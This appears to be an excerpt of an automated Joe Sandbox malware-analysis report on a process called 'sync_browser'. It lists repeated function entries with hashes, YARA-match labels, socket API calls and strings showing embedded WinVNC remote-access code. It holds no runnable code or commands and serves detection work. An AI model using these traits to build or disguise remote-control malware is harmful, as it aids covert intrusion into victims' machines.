                                                    • Instruction Fuzzy Hash: 32319C21B19B4282EB98EB2AF85432D6B91EF85F48F80403ADA4D473E5EF3DD454C760

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                    • String ID: WinVNC Tray Icon
                                                    • API String ID: 2660421340-1071638575
                                                    • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                    • Instruction ID: 91b8d35177c11c43ea739fdfbe17a3b2ef5144ca0a9a4a2c61d44096958a2ef6
                                                    • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                    • Instruction Fuzzy Hash: F2018F21608B8186E708AB66B8448AAFA64FF88FD4FD45036DE4903B68DE3CD885C710
                                                    APIs
                                                    Strings
                                                    • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7D59533D9
                                                    • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF7D5953490
                                                    • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF7D5953429
                                                    • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF7D5953502
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                    • API String ID: 1452528299-2001727811
                                                    • Opcode ID: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                    • Instruction ID: aa44ce3af3cfd1a30fa6420d63f1ab0b698e7ed19bdce11dbadc51e5c541b03d
                                                    • Opcode Fuzzy Hash: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                    • Instruction Fuzzy Hash: 4841E966A05A8582EB55AF26C0887BC67A0FB84F88FC89472CE0D473A4DF3DD585C361
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                    • String ID: <unavailable>
                                                    • API String ID: 4131039871-1096956887
                                                    • Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                    • Instruction ID: 228879e2f94b706de2430e5ef6ea27564c2972f57a8e0512f6df3e32d6efe135
                                                    • Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                    • Instruction Fuzzy Hash: 13318932608B8183EB54AF24E8543ADB3A4FB88B98F940136EE9D477A4EF3CD455C750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: connectgethostbynamehtonsinet_addr
                                                    • String ID:
                                                    • API String ID: 599670773-0
                                                    • Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                    • Instruction ID: 0af1d8a33f7e5ee0069397af49a38b727ce5415d878897b80ff0017fd5fa6f28
                                                    • Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                    • Instruction Fuzzy Hash: 5F118422A18A4186EB64AB25E84163DB7A4FFC8F99FC05136ED4E47794DF3CD401CB24
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _callnewh_errno$AllocHeapmalloc
                                                    • String ID: bad allocation
                                                    • API String ID: 3727741168-2104205924
                                                    • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                    • Instruction ID: 15700d6dd96a2f11ba9f121f1c79e3dad8009aa867a434ac73a26f4660b48a9c
                                                    • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                    • Instruction Fuzzy Hash: 93013C24A1D79793EA18BB50E8405BCA790BF84B88FC41533ED4D866A6EF3CE145C721
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindMessagePostWindow
                                                    • String ID: WinVNC Tray Icon
                                                    • API String ID: 2578315405-1071638575
                                                    • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                    • Instruction ID: 67fbbe2a9f7ece6a64038533b935728c98252dac3ffef2d7799420b08246bf39
                                                    • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                    • Instruction Fuzzy Hash: 3F018421E2865183EB549B16F44066DA650FF88FD8FC85036EE4E57B59DF3CD8918B10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: closesocketshutdown
                                                    • String ID: vsocket.cpp : closing socket
                                                    • API String ID: 572888783-2569437896
                                                    • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                    • Instruction ID: 38fac175b99d31a5c786550d66f787607350c845355622e1f432cea85333c341
                                                    • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                    • Instruction Fuzzy Hash: DFF03771A10A5183EB18AF74C8543A97720FF88F19FA04A36CD2E56299DF38C456C3A1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: selectsend
                                                    • String ID:
                                                    • API String ID: 2999949978-0
                                                    • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                    • Instruction ID: 13add0762b8f4e33140f0eb65055858e88699c3772d26c286d7ca880e50e6de5
                                                    • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                    • Instruction Fuzzy Hash: 3231F632A1879247EA606B15A8847BEE794BF94F9CFC52036DD4D03A50DF3DD8028A60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocHeap_callnewh_errno
                                                    • String ID:
                                                    • API String ID: 849339952-0
                                                    • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                    • Instruction ID: 1561f75323a6ce9a53ab7510130a24b36a5a2c57af6d9b4201a45ce42c5bf924
                                                    • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                    • Instruction Fuzzy Hash: 47115221F0D24287FE556B6596447BCF2D5AF84FA8FC88A32CD1E46AC4DF7CA4448620
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibraryMessageSend
                                                    • String ID:
                                                    • API String ID: 3583424976-0
                                                    • Opcode ID: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                    • Instruction ID: 358967ed1f486d655ed6132560ccd114786b784a6012fd1a0238f283ff60ceed
                                                    • Opcode Fuzzy Hash: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                    • Instruction Fuzzy Hash: C9111825B0F58687FE59FBA185A167C9354AFA8F48FC40532DE0E066858F3CE841C326
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: closesocketsetsockoptshutdownsocket
                                                    • String ID:
                                                    • API String ID: 3513852771-0
                                                    • Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                    • Instruction ID: 4d89e12bdb3af22166660d567221a0763c0cb272638925e1aeb0e2de889dc714
                                                    • Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                    • Instruction Fuzzy Hash: 0FF0C2B2A2821387FB14BF34D8107B9B754AF84B08FD41636DE18862D4DB7DD196CE20
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: setsockopt
                                                    • String ID:
                                                    • API String ID: 3981526788-0
                                                    • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                    • Instruction ID: 8c22b16b3732499c7166c3d497f93ac012c71b3ffa03b7cd8cfe00b07070b0bc
                                                    • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                    • Instruction Fuzzy Hash: 2CF0FC7161419347F7259F74D444679E750FFC4B15F900A32DE9C86AD4CBBCC18A8B10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTickselect
                                                    • String ID:
                                                    • API String ID: 2475007269-0
                                                    • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                    • Instruction ID: 05610aab0c0e3bd28a41baa1c1158a9a785749a2cf8b0906e56760e6f2fec9de
                                                    • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                    • Instruction Fuzzy Hash: 1A31907260478187EB04EF25E5845EDB762EB88F88F89903ADF094B789DF38D5458B60
                                                    APIs
                                                    • Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
